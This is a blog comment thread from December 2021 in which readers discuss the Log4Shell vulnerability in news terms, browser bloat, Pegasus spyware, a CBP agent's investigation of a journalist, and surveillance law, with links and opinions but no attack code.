Comments

ResearcherZero December 10, 2021 7:38 PM

Khalilzad joined Trump in a conference room, along with Vice-President Mike Pence, Bolton, and other national-security officials. He described the Taliban’s promise that they would not allow Al Qaeda to attack the U.S. When it was noted that Ghani was unhappy with the deal, Trump said, “Why are you wasting your time going to talk to Ghani? He’s a crook.”

Trump then asked Khalilzad if he could give the Taliban “something to make them coöperate.”

“What are you talking about, Mr. President?”

“Like money.”

“No,” Khalilzad replied. “They’re on a terrorism list. We can’t give them money.”
https://www.newyorker.com/magazine/2021/12/20/the-secret-history-of-the-us-diplomatic-failure-in-afghanistan

lurker December 10, 2021 9:30 PM

@SpaceLifeForm

[Rhetorical question] Why would I want a remote connection to write arbitrary data to my logfiles? But of course by eschewing such java jiggery-pokery I again am not the target demographic…

SpaceLifeForm December 10, 2021 11:14 PM

@ lurker

You may not be a target, but do you interact with one?

I suspect Apple, Amazon, and Ubiquiti are sweating bullets now.

This log4j problem has probably been exploited for a long time.

That it can leak server-side environment variables to the attacker controlled DNS server (because the DNS traffic is most certainly cleartext), is, well, not good.

JonKnowsNothing December 11, 2021 1:13 AM

@All

Several MSM reports about reconstructing the “Spiral Letter Lock” used by Mary Queen of Scots on her last letter written the night before her execution.

Some are descriptions, while Ars has a set of diagrams about how the locks were done.

A sliver of paper was semi detached from an edge of the letter. It was woven through a slot(s) in a weave and the tail left on the outside of the letter.

The letters were folded into a tiny packet and some locks passed through 60+ layers of paper.

If the lock was damaged while threading it, the letter was rewritten.

The lock didn’t make the letter secure but if anyone other than the designated recipient opened the letter, the lock would be obviously broken.

The lock cutout left a noticeable jagged edge to the sheet. Previous conservation efforts often filled in the gap not recognizing it for the open lock shape.

===

htt p s://www.the guardi an.c om/books/2021/dec/10/mary-queen-of-scots-locked-final-letter-using-paper-folding-research-finds

h ttp s://arstech nica. co m/science/2021/12/mary-queen-of-scots-sealed-her-final-missive-with-an-intricate-spiral-letterlock/

Ted December 11, 2021 2:49 AM

@SpaceLifeForm. ALL

Re: Log4j

Adding to that:

https://en.m.wikipedia.org/wiki/Log4j

“A remote code execution zero-day vulnerability in Log4j 2, called Log4Shell (CVE-2021-44228), surfaced on December 9, 2021. Affected services include Cloudflare, iCloud, Minecraft: Java Edition, Steam, Tencent QQ, and Twitter.[37][38][39] The feature causing this vulnerability can be disabled with a configuration setting, which has been disabled by default in version 2.15.0, officially released a few days prior.[40] The Apache Software Foundation has assigned the maximum CVSS severity rating of 10 to Log4Shell.[39]”

Ted December 11, 2021 2:58 AM

Also, from SANS ISC:

“RCE in log4j, Log4Shell, or how things can get bad quickly”

“Yesterday a PoC for a Remote Code Execution vulnerability in log4j was published. The exploit is actually unbelievably simple – which makes it very, very scary at the same time.”

https://isc.sans.edu/diary/28120

Clive Robinson December 11, 2021 3:34 AM

@ SpaceLifeForm,

For example, you could have addressed various security related issues, such as log4j Log4Shell

It’s kind of ironic that you should mention “Log4j”…

From Wikipedia on it,

“Log4j is one of several Java logging frameworks. Gülcü has since started the SLF4J…”

Is someone trying to tell us something?

As they say “Once is happenstance…”

Curious December 11, 2021 4:08 AM

I’ve never heard of this before, but apparently this is not news it seems as I watched the video in the twitter link below. No idea if this has been discussed previously on this blog, might be old stuff.

Something about hacking your monitor screen so that it overlays some extra graphics by pixels over your browser content rendered on screen, e.g showing an overlay with a region of pixels of a lock icon indicating a secure connection for one’s browser, but without you necessarily noticing anything odd about it. Or, tricking you showing the wrong amount of money on screen when doing a transaction.

https://twitter.com/TechInsider/status/1469603918397247490

Freezing_in_Brazil December 11, 2021 6:53 AM

@ SpaceLifeForm

Any input as to what the software architecture is

I haven’t dwelled on this specific case yet. But in my experience, I dare say it didn`t involve anything much sophisticated [starting by the poorly worded note the crackers left on the site].

The current government is dismantling the scientific-technological structure put together with effort over the last 60 years. Just look at the website of the national weather service[1], which is practically abandoned [under the complacent gaze of the minister of technology, the right-wing (no pun) ‘astronaut’, Marcos Pontes].

The services affected this time were a distance learning platform serving certain internal ministry programs and an IConnect system [platform for booking and payment]. I bet on software configuration issues, and I’m pretty sure weak passwords played a role.

You will never lose money betting on the incompetence of the Brazilian govenment.

[1]htps://cptec.inpe.br

Clive Robinson December 11, 2021 7:02 AM

@ Curious,

Something about hacking your monitor screen so that it overlays some extra graphics…

There are many ways this can be done.

Over a decade and a half ago people were using developing malware that was effectively an “I/O Driver Shim”.

https://en.m.wikipedia.org/wiki/Shim_(computing)

Where they hijacked the OS driver for the screen and overwrote what should have been displayed in a banking application.

The difficulty is not developing code to “overwrite” but correctly identifying “where to overwrite”. Obviously the closer to the application you do that, the easier it is.

Freezing_in_Brazil December 11, 2021 8:43 AM

@ SLF, All

re the cracking of the BR ministry of health

I may have made mistakes in my statements above, citing IConnect [there is a plethora of ‘software solutions’ with this name all over the internet, none of them FOSS].

In fact the software is called ConectSUS [SUS =~ NHS], a CRM program allegedly developed internally. Which doesn’t make things any better. When it comes to the development of systems for the government, there is a history of involvement of crony contractors, to the detriment of companies with technical capacity and assured quality.

By the way, this type of software is usually proprietary and its discussion is not encouraged. It is an unbelievably opaque environment for people used to European/American standards.

It is cause for celebration to have found this document:

htps://scielosp.org/pdf/csp/2021.v37n3/e00243220/en

From the document [sic]:

The Brazilian scenario features a tool that contributes to practice in primary healthcare (PHC): the e-SUS APS (https://aps.saude.gov.br/ape/esus), a strategy by the Department of Family Health to organize healthcare information in PHC in the country 8 and to allow access to information and use of the citizen’s electronic file 9. The e-SUS APS features an online scheduling functionality by which
patients can remotely schedule appointments at health units.

Anders December 11, 2021 9:51 AM

And people DON’T learn…

hxxps://www.blackhat.com/docs/us-16/materials/us-16-Munoz-A-Journey-From-JNDI-LDAP-Manipulation-To-RCE.pdf

Anders December 11, 2021 10:12 AM

@ALL

Singe my post vanish, repost. This also explains why that old
BlackHat presentation link is important.

hxxps://unit42.paloaltonetworks.com/apache-log4j-vulnerability-cve-2021-44228/

JonKnowsNothing December 11, 2021 12:52 PM

@All

re: A guessing compiler

MSM report on FF95 update includes:

On both macOS and Windows, Mozilla has “improved page load performance by speculatively compiling JavaScript ahead of time.”

FF94 included

… new color themes and made changes to the way updates were delivered

iirc(badly) I looked at the FF94 change list, when the first FFNagWare Message Popups happened, the change to the way updates were delivered was:

  Now Automatic, No Approvals, No Warning, No OptOut.

I got to the part about AutoAccept NoOptOut and AutoInstall and stopped reading.

I’m fairly sure I don’t need “new color themes” and I don’t need “A Guessing Compiler” to compile something that’s blocked on my system.

I wonder if Google$$ have something to do with the focus on “new color themes”? Must be masses and masses of users just clamoring for new colors…

But then, I don’t even use DarkMode. I can’t see the teeny white blips that are supposed to be letters.

===

h tt ps:/ /ars technica.c om/gadgets/2021/12/firefox-95-for-windows-and-mac-introduces-rlbox-a-new-sandboxing-tech/

Clive Robinson December 11, 2021 1:31 PM

@ JonKnowsNothing, ALL,

I’m fairly sure I don’t need “new color themes” and I don’t need “A Guessing Compiler” to compile something that’s blocked on my system.

I’m fairly certain I don’t need FireFox and have not for years…

I’d get rid of Android if I could, but there does not appear to be any choice in the market so much for “The Free Market”

I’m of the opinion vanilla HTML 3.x without JavaScript, Cookies or other crapware is realy all I need.

As for HTML 5.0 not interested in the slightest the W3C sold out to Google and Co several years ago… 75% of it is unwanted liability that people appear determind to stop you turning off.

A thought for you,

“Who own’s your browser?” when that “click accept all box” pops up all over anything else being displayed and you can not get rid of it except by clicking on “accept all theft and liability” or the back button or close the window…

Simple answer “not you”…

Do I need software on my system/device that is “not fully under my control” simple answer “No Way José”…

Do I need to keep those FF numpties employed to steal from me? No.

People should not have anything to do with them.

Even Tor-Browser is a liability to users especially with large ISP’s assuming that they have the right to “sell you” to make more than a little more. Nearly all of which I blaim on the likes of Google…

Anders December 11, 2021 3:21 PM

@JonKnowsNothing @ALL

I feel your pain.

Some time ago i downgraded FF to pre-Quantum era.
Some places won’t open any more, but for those i have VBOX with temporary
system.

One reason of the downgrade was the fact that new FF versions hog
the system and crash it on certain websites.

I’m not alone.

hxxps://stackoverflow.com/questions/33797824/firefox-svg-animation-freezes-on-specific-pc

Really, you can have a multi-core latest system and FF turns it to
system that don’t even react on any input no matter how long you wait.

Pre-Quantum at least still have the option to control the updates.
Also i hate the direction FF has taken, removing user control, removing
features with updates (yes, no more FTP support, sigh). I remember times
when FF arrived, something like 15 years ago, it was snappy and nice
browser. Now it’s only resource hog.

And i also hate the direction the modern web has taken.

But we can’t live without web either.

This would be a nice thread to ask what is a nice browser today for Linux and Win? Would be nice if there’s still a XP support too. Thanks for any input.

Anders December 11, 2021 3:41 PM

@ALL

Enjoy, a nice whitepaper.

“Jumping the air gap: 15 years of nation‑state effort”

hxxps://www.welivesecurity.com/2021/12/01/jumping-air-gap-15-years-nation-state-effort/

Ted December 11, 2021 4:11 PM

Hi @ALL

There is a richly-saturated podcast episode that came out on December 10.

It digs into the current state of intl. spyware companies and the fomenting response of the US gov to try to real back on many highly irresponsible activities.

The episode begins with an account from Hungarian journalist Szabolcs Panyi. In 2019 he was investigating a Russian bank that was relocating to Budapest and may have been a front for Russian intelligence. He was looking into why Hungary’s president didn’t seem to take this risk seriously.

And Pegasus spyware got dropped on his phone.

From Panyi:

And that’s the biggest problem because, of course, my privacy was invaded very brutally with this software. But also my right to protect my sources has been infringed.

Additional guests on the podcast include Citizen Lab’s John Scott-Railton, Steven Feldstein of the Carnegie Endowment for International Peace, and Yaakov Katz, editor-in-chief of The Jerusalem Post.

An interesting concern IMO is the entanglement of many former security officials in these privatized companies. It’s also eyebrow-raising that groups like the NSO are not intending to stop with the deployment of their products to only autocratic countries, but are honing these products to sell to the regional and municipal policing forces of western countries. Without good oversight, this could be a real clusterf*ck of civil society violations.

https://www.wbur.org/onpoint/2021/12/10/why-the-u-s-is-cracking-down-on-international-spyware

AL December 11, 2021 4:46 PM

@JonKnowsNothing
As far as the Firefox update business is concerned on Windows disable BITS.
https://www.askvg.com/tip-block-firefox-to-download-updates-using-bits-on-windows/

There are two backdoors that browsers use, BITS and winhttp.
In Firefox, I block these DLLs in EMET, and it still runs. Other browsers don’t run.

“winhttp.dll;qmgr\*.dll;wbem\*.dll;msctf.dll;combase.dll”

For me, Firefox is my primary browsers. I like EMET because it takes wildcards. Trying to shut off WMI without wildcards would be a pain.

Clive Robinson December 11, 2021 5:20 PM

@ Anders, JonKnowsNothing, ALL,

But we can’t live without web either.

Can’t we?

Funny I spent oh must be half my life without it before “NetScrap” got going, I even remember exactly why it was called “javascript” even though it has absolutly nothing what so ever to do with Oak/Java at the time.

Then there was getting HTTPS PubKey the wrong way around, and NetScrap’s random generator bo-bo…

Microsoft doing their “embrace and extend” and telling lots of lies in Court about IE…

Who remembers when you couldn’t have the Web without Adobe or MacroMedia installed or even Java at one point…

HTML was usefull upto version 3.2ish then it was all unwanted “feature load”.

Now I am seriously looking at getting a “text only” browser up and running, might even “shell script” something around wget and stunnel for a laugh, I used to do it for “scraping” back in the late 1990’s

What’s the betting it can be got going on a Raspberry Pi Zero 2 W running Deb Linux… With a serial port for a terminal touch screen HDMI display and I’ve got a 2G phone[1] without GPS bur with “data” and a micro USB socket to use as a mobile modem (you can buy one new for less than ~$/€15).

Might make a fun project to do over the “Winter Solstice” after all with festive omicron glittering from “Jack Frost’s Nose”, indoors in front of the fire is looking like the thing to be doing. Especially as they are now talking about “Plan C for Christmas”…

[1] Not sure what the status of 2G is around the world, in the UK it looks like 3G is going but 2G is staying for now… Apparently way to many 2G users but darn few 3G these days, with 4G LTE giving most people what they need…

Anders December 11, 2021 5:24 PM

@Clive

“Can’t we?”

Take this place…it’s web…browser is needed, even proper https is NEEDED, you remember my cries, don’t you?

John December 11, 2021 5:33 PM

@Clive,

I use dillo -l realURL when I can. Works well with many sites. Load garbage just gets ignored.

I use an old SeaMonkey that uses wget to get pdfs. Works well also for many pdfs including the recent one about air-gapped systems.

For ‘garbage sites’ I load a reent 64 bit Linux and use a recent Firefox or whatever. Always a real pain!

This is AntiX 19.3 I think. Newer versions of AntiX don’t seem to work very well?? Oh, well. This version is fast to load. And fast to kill and restart when it gets hacked.

And as you note: The web is becoming basically garbage dominated by the Google Giggle and friends and their anti-social programs.

john

someone December 11, 2021 5:45 PM

@Clive re text browser – is any of the source code for Lynx still viable? I’ve actually thought about rolling my own browser myself. Although I might want some primitive image support. Currently using ungoogled chromium completely locked down. It’s the best I’ve been able to do recently, but I don’t really trust that, either.

someone December 11, 2021 5:48 PM

@ResearcherZero re: payments to terrorist watch list entities – I’m certain that no covert US agency has ever funneled cash to any organization on such a list, right?

Anders December 11, 2021 5:50 PM

(mental note to myself)

Some suggestions here, but still. is there any better choices?

hxxps://restoreprivacy.com/browser/secure/

JonKnowsNothing December 11, 2021 6:37 PM

@Anders, @Clive, @ALL

re: Really, you can have a multi-core latest system and FF turns it to
system that don’t even react on any input no matter how long you wait.

I have a multicore system (old). When FF added the multi-thread the setting defaulted to 8 cores. My system froze solid.

It took some round about testing to find out why? my system went from AOK to a pile of dead-iron. Setting the cores to 1 worked.

It’s another example of stuff not needed, stuff not tested, designed obsolescence.

My response when anyone asks why I turn off such improvements:

The internet is like a garden shed. It did the job it was designed to do.

Then someone decided to add on to the garden shed.

After a so many add-ons they’ve built the Taj Mahal on top of the garden shed.

The garden shed is collapsing under the weight.

@Clive

re: Now I am seriously looking at getting a “text only” browser up and running, might even “shell script” something around wget and stunnel

If you make it into a kit I’d buy it. Maybe even a bunch. (1)

===

1) In the dust bowl of California all tech is hard to come by.

Clive Robinson December 11, 2021 6:46 PM

@ Anders, ALL,

Enjoy, a nice whitepaper.

It’s made me smile for a couple of good reasons,

1, There is stuff missing from 2003ish that’s still around.
2, Not all “air gap crossing” was “Nation State”.

Longterm readers will know why I know this… Let’s just say it was to do with “Voting Machines” and leave it at that 0:)

Anders December 11, 2021 7:07 PM

@Clive @ALL,

“Now I am seriously looking at getting a “text only” browser up and running, might even “shell script” something around wget and stunnel for a laugh, I used to do it for “scraping” back in the late 1990’s”

While it might be fun, this site still remains the web that requires https and a reasonable fresh browser (luckily i still can use it with pre-Quantum era FF).

But what might be actually cool and fun – recreate old-school BBS mirroring this site. Possibility to read and posts entered here over the telnet from any old DOS based client would be just awesome.

Ted December 11, 2021 7:43 PM

“Even several years later, Rambo is still furious at the bar for giving Watkins his credit card receipt.”

Let’s talk ‘Operation Whistle Pig.’

Whistle Pig was the name of the drink Jeffrey Rambo ordered at the bar where he covertly investigated Politico reporter Ali Watkins in 2017. He suspected that James Wolfe, former director of security for the Senate Intelligence Committee, was providing Ali information and access in exchange for a personal relationship with her.

Jeffrey Rambo was a Customs and Border Patrol agent who worked in the National Targeting Center. He still works at the CBP. Ali Watkins is now a journalist at the NY Times.

The rub was that Rambo and the groups he worked may have been out-of-scope as they rummaged through numerous sensitive government databases, for which Rambo says there were few rules for accessing.

Rambo’s Counter Network Division is tagged as a “bridge between law enforcement agencies and the intelligence community that prided itself on taking “out of the box” approaches.”

But Hugh Handeyside, the ACLU attorney, says “these very lack of procedures are the heart of the problem: “We’re in a very dangerous place if having no rules means officers can’t break any rules.””

“Department of Homeland Security Office of Inspector General launched an investigation into Rambo, who was put on administrative leave. The probe, conducted jointly with CBP’s Office of Professional Responsibility, focused on whether Rambo improperly accessed government databases to get information on Watkins and Wolfe without a need to know, and if he’d used that information to question Watkins about possible leaks of classified information outside the scope of his official duties.”

Ultimately the decision was made not to prosecute Rambo.

“That doesn’t surprise Geoffrey Stone, a University of Chicago law professor and constitutional law expert who has reviewed surveillance programs. When the government wants to investigate someone for doing something illegal or inappropriate, it has free rein so long as it doesn’t violate any specific law. “If there is no law or policy that specifically regulates it, then there’s nothing that prohibits it,” he said.”

Jeffrey Rambo now works his day job at the CBP. And he’s also opened a coffee shop – Storymakers Coffee Roasters in the Barrio Logan section of San Diego, home to a tight-knit Latino community.

Rambo, however, is not receiving an overwhelming amount of love in his neighborhood currently.

“In late September, he arrived one morning and found a photo of himself plastered to a telephone pole outside, identifying him as a Border Patrol agent. It called him a racist who tried to blackmail a journalist. Some posters had a QR code that linked to a list of articles about Rambo.”

If only the bar where he ordered his Whistle Pig hadn’t given Watkins the receipt with his real name.

https://news.yahoo.com/operation-whistle-pig-inside-the-secret-cbp-unit-with-no-rules-that-investigates-americans-100000147.html

Ps: If you think this is long, the original article is about 7,000 words.

ResearcherZero December 11, 2021 9:16 PM

@Ted

“Prosecutors can bring charges against people for sharing information with the public only when classified or other national security material is at issue. Material cannot be classified to conceal legal violations or prevent embarrassment.”

https://www.archives.gov/isoo/policy-documents/cnsi-eo.html#one

“We are reviewing the entire process of how we conduct media leak investigations by responding to issues that have been raised by our career prosecutors and agents,” Rosenstein said. “We’re taking basically a fresh look at it. . . . We don’t know yet what, if any, changes we want to make, but we are taking a fresh look.”

Coats said the hunt for reporters’ sources would go well beyond the intelligence agencies. “These national security breaches do not just originate in the intelligence community. They come from a wide range of sources within the government, including the executive branch and including the Congress,”

https://www.washingtonpost.com/world/national-security/attorney-general-says-justice-dept-has-tripled-the-number-of-leak-probes/2017/08/04/1a395064-791d-11e7-9eac-d56bd5568db8_story.html

“I’m called a rogue Border Patrol agent, I’m called a right-hand man of the Trump administration, I accessed data improperly, I violated her constitutional rights — all of these things are untrue,” Rambo told Yahoo News. “All these things are standard practices that — let me rephrase that. All of the things that led up to my interest in Ali Watkins were standard practice of what we do and what we did and probably what’s still done to this day.”

lurker December 11, 2021 9:37 PM

@Anders: firefox-svg-animation-freezes-on-

-dancing-gerbils? Kids, .gif was good enough for grandad, that chunky pixelation is just a reminder who’s paying for your internet…

ResearcherZero December 11, 2021 10:06 PM

@Ted

“The United States has, of course, an important national interest in protecting national security information against unauthorized disclosure,” Garland wrote in his memo. “But a balancing test may fail to properly weight the important national interest in protecting journalists from compelled disclosure of information revealing their sources, sources they need to apprise the American people of the workings of their government.”

The memo makes clear that federal prosecutors can, in some cases, obtain journalists’ records. Those exceptions include if the reporters are suspected of working for agents of a foreign power or terrorist organizations, if they are under investigation for unrelated activities or if they obtained their information through criminal methods like breaking and entering. There are also exceptions for situations with imminent risks, like kidnappings or crimes against children.

Others whose records were obtained were Democratic members of Congress and aides and former White House counsel Don McGahn.
https://apnews.com/article/justice-department-reporters-records-merrick-garland-e2348419815ef84dc75cbecd7e546b39

Although improperly obtained evidence may have been used to prosecute leaks, generally, embarrassment was considered a much higher priority than breaking the law. But, the official position is that going “Rambo” is to be frowned upon.

Ted December 11, 2021 10:11 PM

@ResearcherZero
“Material cannot be classified to conceal legal violations or prevent embarrassment.”

Interesting.

I am so upset I can’t find a tweet where someone lamented that even a christmas letter had been classified. It was funnier than I am making it sound.

Thanks for the info on the EO and the ratcheting up of investigations on media leaks.

more…

Ted December 11, 2021 10:13 PM

@ResearcherZero

cont.

I think our friend Rambo got a little gung-ho however.

“Rambo, who was later pressed repeatedly about why he chose to reach out to Watkins, a reporter who had never written about forced labor, said he was looking for prominent journalists with access and buzz. He told investigators he wanted to identify national security journalists who could not just tell CBP about forced labor but also publish stories that would allow him to “overstate” U.S. enforcement capabilities. Rambo believed these stories inflating U.S. capabilities would prompt shippers to alter their routes, proving they were involved in illegal activities.”

A bit of a stretch for being asked to look at forced labor used for cobalt mining in the Dem. Rep. of Congo for consumer goods in China. (wat?)

It looks like Bruce has written much about the risks of over classification.

If I find that tweet I will post it.

Ted December 11, 2021 10:23 PM

@ResearcherZero

But, the official position is that going “Rambo” is to be frowned upon.

Haha! Yes, but as you draw out some complexity, checks and balances are good.

ResearcherZero December 11, 2021 11:47 PM

@Ted

Checks and balances definitely are good, as unofficially or “off-the-record”,
“going Rambo” at arms distance, or where it can not be proven, is not always frowned upon, and increasingly so it would seem.

“The numbers of more than 180 journalists are listed in the data, including reporters, editors and executives at the Financial Times, CNN, the New York Times, France 24, the Economist, Associated Press and Reuters.”
https://www.theguardian.com/world/2021/jul/18/ft-editor-roula-khalaf-among-180-journalists-targeted-nso-spyware

“A successful infection enables an NSO client to access everything on the device, including contacts, chat messages – and precise location. Pineda’s phone disappeared from the scene of his murder, so a forensic examination to determine if it was targeted or infected with spyware was not possible.”

“The gunmen who murdered him could have learned of his location at a public carwash through means not related to NSO’s technologies, or its clients. But his attackers knew exactly where to find him, even though the hammock where he lay was not visible from the street.”

“People with power can do whatever they want to anyone,” said his widow, Marisol Toledo, when told Pineda had been selected for potential targeting. “If they succeeded [in infecting his phone], they would have known where he was at all times.”
https://www.theguardian.com/news/2021/jul/18/revealed-murdered-journalist-number-selected-mexico-nso-client-cecilio-pineda-birto

“I think once you choose to charge Assange with publishing information that the Government said was secret, it’s not a huge step to charge The New York Times or a New York Times reporter or editor with publishing information the Government said should be secret,”
https://www.abc.net.au/news/2019-07-29/trump-administration-after-assange-and-it-serves-as-a-warning/11350854

Spain’s National Court is investigating a Spanish private security firm on suspicion it spied on Julian Assange on behalf of the US while he was inside the Ecuadorean embassy in London, according to a ruling made public on Wednesday.

The court said Morales paid €20,000 (US$22,000) a month in cash to the head of security at the embassy to ensure that there were no negative reports about Undercover Global that could lead to its contract being terminated.
https://www.scmp.com/news/world/europe/article/3032260/spanish-firm-undercover-global-accused-spying-wikileaks-founder

ResearcherZero December 12, 2021 12:28 AM

@Ted

If governments do get caught doing something wrong, they resort to changing the law.

For example, it used to be illegal for New Zealand’s foreign intelligence agency, the Government Communications Security Bureau to spy on the public in New Zealand, so the law was changed after they were caught illegally spying.

“the agency wrongly spied on Kiwis in the Pacific, and used its eavesdropping powers to snoop on rival candidates for the job of World Trade Organisation boss”
https://www.stuff.co.nz/national/politics/80303385/new-gcsb-director–a-consummate-public-servant

THE GCSB lost control of its surveillance technology and wasn’t aware its systems continued spying on Kim Dotcom, according to new documents from the spy bureau.

It claimed that it turned off all surveillance systems targeting Dotcom and others but
found out more than a year later that surveillance continued without its knowledge.

The details in the documents have led Dotcom to state that there is now evidence the United States’ National Security Agency was carrying out surveillance on him.

Dotcom, who should have been protected from GCSB surveillance as a New Zealand resident, said the GCSB did not know because its equipment was being used by the NSA, which was “directly involved”.
https://www.nzherald.co.nz/nz/gcsb-had-no-idea-spy-gear-was-still-targeting-kim-dotcom/P55O2VGPHPIZVLQXSUNKVLLBIM/

Law Commissioner Donna Buckingham said the act, which governs the search and surveillance activities of police and some other enforcement agencies, is already working well after becoming law in 2012.

“The act does not need a major overhaul. All we are proposing are amendments to make the law clearer and to update it in response to the effects of new technology,” she said.
https://www.nzherald.co.nz/nz/joint-review-recommends-changes-to-search-and-surveillance-laws/SIW5LBCEWRB7TK2RSCVY4YYLJA/

The National Security Act of 1947 contained a specific ban on intelligence operatives from operating domestically. In the 1970s, America learned about the extensive domestic political spying carried out by the FBI, the military, the CIA, and the NSA, and Congress passed new laws to prevent a repeat of those abuses.

The law on surveillance begins with the Fourth Amendment to the Constitution, which states clearly that Americans’ privacy may not be invaded without a warrant based on probable cause.

The right of the people to be secure in their persons, houses, papers, and effects, against unreasonable searches and seizures, shall not be violated, and no warrants shall issue, but upon probable cause, supported by oath or affirmation, and particularly describing the place to be searched, and the persons or things to be seized.

The US Supreme Court (US v. Katz 389 US 347) has made it clear that this core privacy protection does cover government eavesdropping. As a result, all electronic surveillance by the government in the United States is illegal, unless it falls under one of a small number of precise exceptions specifically carved out in the law.

United States Code Title 50, Chapter 36, Subchapter 1
Section 1809. Criminal sanctions

(a) Prohibited activities
A person is guilty of an offense if he intentionally-

(1) engages in electronic surveillance under color of law except as authorized by statute

There are only three laws that authorize any exceptions to the ban on electronic eavesdropping by the government. Congress has explicitly stated that these three laws are the exclusive means by which domestic electronic surveillance can be carried out (18 USC, Section 2511(2)(f)). They are:

Title III and the Electronic Commnunications Privacy Act make up the statutes that govern criminal wiretaps in the United States.
FISA. The Foreign Intelligence Surveillance Act is the law that governs eavesdropping on agents of "foreign powers" within the United States, including suspected foreign terrorists.

Title III and ECPA govern domestic criminal wiretaps and are not relevant to the NSA’s spying. FISA is the law under which the NSA should have operated. It authorizes the government to conduct surveillance in certain situations without meeting all of the requirements of the Fourth Amendment that apply under criminal law, but requires that an independent Foreign Intelligence Surveillance Court oversee that surveillance to make sure that Americans who have no ties to foreign terrorist organizations or other “foreign powers” are not spied upon.

…warrantless surveillance would have been legal for only 15 days after the resolution was passed on September 18, 2001.

FISA contains explicit language describing the president’s powers “during time of war” and provides that “the President, through the Attorney General, may authorize electronic surveillance without a court order under this title to acquire foreign intelligence information for a period not to exceed fifteen days following a declaration of war by the Congress.” 50 U.S.C. § 1811 (emphasis added).

Ted December 12, 2021 12:58 AM

@ResearcherZero

Re: 180 journalists

Those are real flesh and blood people.

“When you think that there was a camera, and maybe there is a camera in your toilet, your body stops functioning”

“The Pegasus Project: Life for Khadija Ismayilova in Azerbaijan’s Digital Autocracy”

https://youtu.be/AN7EOiyOvl4?t=218

Re: Mexico

“Mexico is the world’s most dangerous country for reporters outside of warzones.”

Wow.

Re: Assange

”There’s an irony here that Julian Assange helped get Trump elected, yet now the President wants to prosecute him.”

Zero trust.

Re: SCMP article

Hiding behind a paywall.

But this: “Security company allegedly installed hidden microphones in fire extinguisher at Ecuadorean embassy and in women’s toilets where Assange met his lawyers”

Enough with the toilets already.

Gerard van Vooren December 12, 2021 1:12 AM

@ Clive Robinson • December 11, 2021 5:20 PM,

Yes, I agree entirely. In the recent past I was thinking about “updating” the Gopher protocol to become “more modern”, because I think that “the web” has become obsolete (for me). Why is the web obsolete? Because when I search for things about technology, such as installing a new server, I always end up with guys that wrote things for “their” setup (R0.2.48.83, with “their” framework “R0.1.24.838403”), not mine, and I end up with lots of other crap. For instance, I want to set up Mastodon, and even after a couple of weeks I still don’t have it running. I know I am not as bright as the guy who wrote that article, but I know that I am not as dumb as well. My girlfriend also has problems with the web, but I don’t think that I can ever have that much influence over her, so I am afraid that she is a lost case when we are talking about “the new technology”. The only thing that she wants is a new tablet. And she doesn’t care about all the ads that she gets…

So I did a bit of research about Gopher and I looked at the wiki page. There is nothing wrong with the Gopher protocol, except that you don’t get a “menu box” where you can fill in a form. This lack is something that is missing. I mean something like the forms that you could create with Turbo Pascal/C. Those kind of forms. It is not there. The rest could all be the same but this is necessary. And of course also authentication should be updated. How can you be sure that you are dealing with the right guy? So also DNS should be updated.

Well, this are my ideas. You are free to attack.

Ted December 12, 2021 1:35 AM

@ResesrcherZero

Re: New Zealand’s foreign intelligence agency, the Government Communications Security Bureau

“But the fact we do seek intelligence about the intentions, capabilities, and activities of foreign parties shouldn’t come as a surprise. That’s one of the key reasons we exist.”

And intelligence on Kiwis too.

What channel’s does NZ’s GSCB communicate on? Not on Twitter?

Anonymous December 12, 2021 1:48 AM

@ Gerard van Vooren • December 12, 2021 1:12 AM

Do you know about hxxps://gemini.circumlunar.space

ResearcherZero December 12, 2021 3:14 AM

@Ted

I think GSCB mainly concerns itself with monitoring social media and maintaining a low-key presence. Many such bureaus don’t have an official account.

The danger with regard to the lack of procedural safeguards for prisoners’ privileged communications is that it leads to what Lord Phillips, in his dissenting judgment in re McE, described as the, “chilling factor that LPP is intended to prevent.”

That is, when the law allows the state to listen in on privileged communications, clients feel unable to speak openly with their lawyers. The consequences of this are potentially devastating. Without the full facts, counsel may not be aware of all potential avenues of legal redress available to the prisoner in respect of, amongst other matters, appeals, probationary hearings and complaints as to his or her mistreatment whilst in prison.

This goes to the heart of the criminal justice system and is a very real concern. On 11 November 2014, the then Lord Chancellor and Secretary of State for Justice was forced to announce to the House of Commons that, between 2006 and 2012, there had been a number of instances where telephone calls between a prisoner and his or her lawyer (and, separately, telephone calls between a prisoner and his or her constituent MP) had been wrongly recorded and in some cases listened to by prison staff.
https://www.wilmerhale.com/en/insights/blogs/WilmerHale-W-I-R-E-UK/prison-rules-unwarranted-and-self-authorised-surveillance-of-prisoners-legal-consultations

This also goes on outside of prisons, including monitoring of individuals communications with legal counsel who are not prisoners, and who have not been convicted of a crime, using a variety of different methods.

ResearcherZero December 12, 2021 4:35 AM

@Supreme Leader

A Radicalized Christian and a Communist managed to negotiate a nuclear arms treaty, so anything is possible.

“The treaty resolved a crisis of the 1980s when the Soviet Union deployed a missile in Europe called the SS-20, capable of carrying three nuclear warheads. The United States responded with cruise and Pershing II missiles based in Europe.”

“By the time President Ronald Reagan and Mikhail S. Gorbachev, the Soviet leader at the time, negotiated the deal to ban the weapons in 1987, the intermediate-range missiles had come to be seen as a hair trigger for nuclear war because of their short flight times — as little as 10 minutes.”
https://www.nytimes.com/2019/02/01/world/europe/inf-treaty.html

Signed by the US and the USSR in 1987, the arms control deal banned all nuclear and non-nuclear missiles with short and medium ranges, except sea-launched weapons.

Many experts believe that negotiations should have continued to try to bring the Russians back into compliance. It is, they fear, part of the wider unravelling of the whole system of arms control treaties that helped to curb strategic competition during the Cold War.
https://www.bbc.com/news/world-us-canada-45930206

In a move that reflected what he said was “a vastly different world,” President Bush formally announced today that the United States was withdrawing from the Antiballistic Missile Treaty that it signed with the Soviet Union in 1972.
https://www.nytimes.com/2001/12/13/international/bush-pulls-out-of-abm-treaty-putin-calls-move-a-mistake.html

Instead of trying to hack each other’s satellites every day, that effort could instead be put into negotiating a new treaty.

Security relies on cooperation, without cooperation there really isn’t any security at all, just a bunch of rhetoric about strategic defense, which in reality means more weapons of mass destruction. And that is why all the bridges and roads are f**cked, because the money was spent on weapons that you can not use without destroying yourself, which seems just a little bit MAD.

Clive Robinson December 12, 2021 6:10 AM

@ Gerard van Vooren,

Well, this are my ideas. You are free to attack.

Attack no, a little caution yes.

Look up Z3950 that underlies some of the older search and information systems (WAIS vring the originator).

In the begining it was a nice protocol…

A comoany I worked for used Z3950 and had a client for it. It also had a seat on the standards committee which might sound glamourous to some but in reality was a “Right Royal Pain in the BTM”.

